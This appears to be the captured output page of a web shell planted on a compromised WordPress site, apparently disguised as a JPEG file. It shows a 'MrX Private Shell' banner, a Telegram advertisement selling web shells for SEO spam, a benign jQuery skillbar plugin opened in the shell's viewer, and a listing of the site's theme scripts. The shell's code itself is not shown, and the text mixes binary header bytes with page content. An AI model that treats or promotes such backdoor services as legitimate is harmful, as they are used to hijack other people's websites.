����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
/*!jQuery Simple SkillBar*/
/**
* Version: 1.0.0 (06/11/2016)
* Copyright (c) 2016 Leonhard Sinaga
* Under MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/licenses/gpl.html
* Source: https://github.com/leonhards/jquery-simple-skillbar
*/
(function ( $ ) {
"use strict";
var sb = {};
sb.o = function() {
this.o = null;
this.$ = null;
this.run = function() {
this.o = $.extend(
{
width: this.$.data('width') || 80,
height: this.$.data('height') || 30,
textColor: this.$.data('text-color') || '#ffffff',
background: this.$.data('background') || '#337ab7'
}, this.o
);
this.class(this.$);
this.intv(this.$);
return this;
};
};
sb.cb = function() {
sb.o.call(this);
this.class = function(i) {
i.addClass("sb_progress");
i.html("<div class='sb_bar'><div class='sb_label'>"+i.text()+"</div></div>");
i.css({
position: 'relative',
width: '100%',
backgroundColor: '#dddddd',
height: this.o.height+'px'
});
i.find('.sb_bar').css({
position: 'absolute',
width: '1%',
height: '100%',
backgroundColor: this.o.background
});
i.find('.sb_label').css({
paddingLeft: '5px',
lineHeight: this.o.height+'px',
color: this.o.textColor
});
};
this.intv = function(i) {
var s = this;
var e = i.find('.sb_bar');
var w = 1;
var t = setInterval( function() { itv(); }, 10 );
var itv = function() {
if ( w >= s.o.width ) {
clearInterval(t);
} else {
w++;
e.css('width', w+'%');
}
};
};
};
$.fn.simpleSkillbar = function(o) {
return this.each(function() {
var d = new sb.cb();
d.o = o;
d.$ = $(this);
d.run();
});
};
}( jQuery ));| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| backend.js | File | 47.93 KB | 0644 |
|
| frontend.js | File | 19.32 KB | 0644 |
|
| jquery.colorbox.js | File | 28.49 KB | 0644 |
|
| jquery.mCustomScrollbar.concat.min.js | File | 44.41 KB | 0644 |
|
| owl.animate.js | File | 2.94 KB | 0644 |
|
| owl.autoplay.js | File | 4.43 KB | 0644 |
|
| owl.carousel.js | File | 44.04 KB | 0644 |
|
| owl.navigation.js | File | 10.34 KB | 0644 |
|
| simple-skillbar.js | File | 2.34 KB | 0644 |
|
| wp-color-picker-alpha.js | File | 15.24 KB | 0644 |
|